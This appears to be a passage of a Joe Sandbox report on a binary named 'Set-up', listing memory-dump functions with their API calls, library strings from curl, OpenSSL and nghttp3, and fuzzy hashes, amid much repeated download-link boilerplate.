Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: b6dc696a9d249f7b9c8de163081ef89231b82f59aaf832f97f0eeaf5d82f5464
Instruction ID: b56caa1b295a052fb534e10bf65a5d5a8d50ccfe17bf6b5d53d9d99892d4ea46
Opcode Fuzzy Hash: b6dc696a9d249f7b9c8de163081ef89231b82f59aaf832f97f0eeaf5d82f5464
Instruction Fuzzy Hash: A3B17C72A042099FCB54CF28C884AAE7BE5BF88314F19862DFD5997365D770EC40AB81

Function 00CAC5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC685

Part of subcall function 00C873F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C8741D
Part of subcall function 00C873F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00C87445

Part of subcall function 00C873F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C87486
Part of subcall function 00C873F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C874AA
Part of subcall function 00C873F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C874B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC719

Strings

vtls/vtls.c, xrefs: 00CAC653, 00CAC69D, 00CAC6E7, 00CAC72E, 00CAC756, 00CAC77F, 00CAC7A8, 00CAC7D1, 00CAC7FA, 00CAC823, 00CAC84C, 00CAC875, 00CAC935, 00CAC95F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: b4aaf3ad7b1b96075f7d8f26d60089a72f62c1d3169d5e467eccfd75c90fd34f
Instruction ID: 49ac9320e4395bac3a989e458c172f9b9332facd03656b67436a1493e7fa1507
Opcode Fuzzy Hash: b4aaf3ad7b1b96075f7d8f26d60089a72f62c1d3169d5e467eccfd75c90fd34f
Instruction Fuzzy Hash: 09A19070B007039BDB209F76E985B22B7E8BF05748F08413DE969CB681FB75E9108B94

Function 00E0E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 00E0E9A3

Strings

BN_lshift, xrefs: 00E0E7E2
, xrefs: 00E0E992
crypto/bn/bn_shift.c, xrefs: 00E0E7E9

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: 6b98c5c9fc80c3840168102104d87baab222adeeb54e81cd653cfddaab48aba2
Instruction ID: 260fddf92f8d86390220513fc88de7bbf7034ba901935be91560895d291f24ab
Opcode Fuzzy Hash: 6b98c5c9fc80c3840168102104d87baab222adeeb54e81cd653cfddaab48aba2
Instruction Fuzzy Hash: EC71CD71A087149BC725DF29C88062AF7A1EFDA710F488B2EF9A977391D770AC41CB41

Function 00E84870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00E305BF,00000000,00000000,input), ref: 00E84986
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00E849D4

Strings

ossl_property_string, xrefs: 00E8491C, 00E8494F
crypto/property/property_string.c, xrefs: 00E84926, 00E84959, 00E8499A, 00E849F3, 00E84A4D, 00E84A72

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: crypto/property/property_string.c$ossl_property_string
API String ID: 3412268980-3682758481
Opcode ID: 01b81997c62bc2485efe84116ffe34c75ba42bdc0405a12ed9560a2873bd6691
Instruction ID: 88764d07007f225b9e88807ea32333a4976976930edd917c7e21a118f1386055
Opcode Fuzzy Hash: 01b81997c62bc2485efe84116ffe34c75ba42bdc0405a12ed9560a2873bd6691
Instruction Fuzzy Hash: D951E7F6D443066BE6217A64BC03F5B7AD89F54748F041438FD8CB6293FA61EA24C792

Function 00E76590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00E7662C

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

ocsp_match_issuerid, xrefs: 00E766A9, 00E766E3, 00E7675D
crypto/ocsp/ocsp_vfy.c, xrefs: 00E766B3, 00E766ED, 00E76767

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: 277fad2c2f68b493c40cdf0537fdbcff760dfd9be41f38d1e301f5eadd1ec3d7
Instruction ID: a508be3da53084c657b4783703702800b54d615b6ce999fcf1b85765d8fabce5
Opcode Fuzzy Hash: 277fad2c2f68b493c40cdf0537fdbcff760dfd9be41f38d1e301f5eadd1ec3d7
Instruction Fuzzy Hash: A54116E5A4470577EA2036B12C8BF9B39888F5538CF146535FE0DB92C3F961DA14C2A7

Function 00D48710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00D48769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 00D487D1

Part of subcall function 00D488B0: QueryPerformanceFrequency.KERNEL32(?), ref: 00D488C1
Part of subcall function 00D488B0: QueryPerformanceCounter.KERNEL32(?), ref: 00D488CC

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: 43ecd7b3e1ec649ff281b7d99dae5bbd8302a6953d1981bc6e175596d49b0a2c
Instruction ID: fd9d752f8820281a524ae725c6d354b4e99e1bd14959e845c57d2bb0bea8866e
Opcode Fuzzy Hash: 43ecd7b3e1ec649ff281b7d99dae5bbd8302a6953d1981bc6e175596d49b0a2c
Instruction Fuzzy Hash: 6A31A5B6B00205ABEB049A25EC85B6F776CFB80390F584538EC56D7191EF31ED14A7B1

Function 00E360E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00E37CCC,?,00000000,00E37127,00E37CCC,00000000,00E5CAB7,00C81A70), ref: 00E360E3
SetLastError.KERNEL32(00000000), ref: 00E361A5

Strings

crypto/err/err_local.h, xrefs: 00E3620C, 00E36227, 00E36257
crypto/err/err.c, xrefs: 00E36275

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: 17446af903c6ab82f1bc3c758d6cf27cc4e92e485d67562b4dd3b80bb15df9cb
Instruction ID: 4ff4edee42f8fe8ae2187ccc0e747581a54ce2b36011d2a89e67141b0d6d8583
Opcode Fuzzy Hash: 17446af903c6ab82f1bc3c758d6cf27cc4e92e485d67562b4dd3b80bb15df9cb
Instruction Fuzzy Hash: CD312BB46803037BE6211E397C1BF667B84AB4470DF145234FD14752EBE7B5A838CA95

Function 00E109A0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00EA066D,?,?,?), ref: 00E10AAD

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

BUF_MEM_grow_clean, xrefs: 00E109CB
crypto/buffer/buffer.c, xrefs: 00E109D2, 00E10A31, 00E10A47, 00E10A7F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memset
String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
API String ID: 2970985887-4138242688
Opcode ID: b272cfc71ea0a67ea52c55bc3dfab5aa91cb126737a3701be7b9ba7766d1d0d8
Instruction ID: f532060322efc2b06a23a03d8c096120a28652dc895bba74950278fa957da3e7
Opcode Fuzzy Hash: b272cfc71ea0a67ea52c55bc3dfab5aa91cb126737a3701be7b9ba7766d1d0d8
Instruction Fuzzy Hash: 2B31FD71754305ABDB10AE24DC87FAA7BD89F81714F088519FC89BB2C6E6B4D8C48661

Function 00DF4460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00DF71DD,00000000,?,?), ref: 00DF44AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 00DF44FF

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

ASN1_STRING_set, xrefs: 00DF447D
crypto/asn1/asn1_lib.c, xrefs: 00DF4487, 00DF44DB

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: f5fb37e9bdbeca803d2297bd5c270fac48b84a38efe8dd2698ca68c44715ac9e
Instruction ID: 55d0c09560501340a413732fd5e7ec7ae20486dac74303719668e1f9ad7dc6ca
Opcode Fuzzy Hash: f5fb37e9bdbeca803d2297bd5c270fac48b84a38efe8dd2698ca68c44715ac9e
Instruction Fuzzy Hash: BD110BB1A043196BD7216D649885B7777D89F91710F1A8129FF557B382EAB0DC04C2F1

Function 00D2C220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 00D2C4E7

Strings

nghttp3_qpack.c, xrefs: 00D2C4DD
(size_t)(p - pbuf->last) == len, xrefs: 00D2C4E2

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: 49f17f7b4ff40d42e1c7015810666a403a5310d34e0150de0c29e438499b5717
Instruction ID: d2738976d887ae5aefa3a64952e6995f63b94a420f8ea3b293941b903bdee830
Opcode Fuzzy Hash: 49f17f7b4ff40d42e1c7015810666a403a5310d34e0150de0c29e438499b5717
Instruction Fuzzy Hash: 7681F671A183109FD704DE2CD89072EB7D2EFA9318F189A7CE8998B3D2D635DC498791

Function 00E0C950 Relevance: 5.4, APIs: 4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca133013a116d53a448ff934384644f151ccf1b99d6f45ce66b1454f5bfae0f
Instruction ID: bc795f832ab52ae7dc6043c60c435cf2df530e8dcf8f8d5206f1218eba75b885
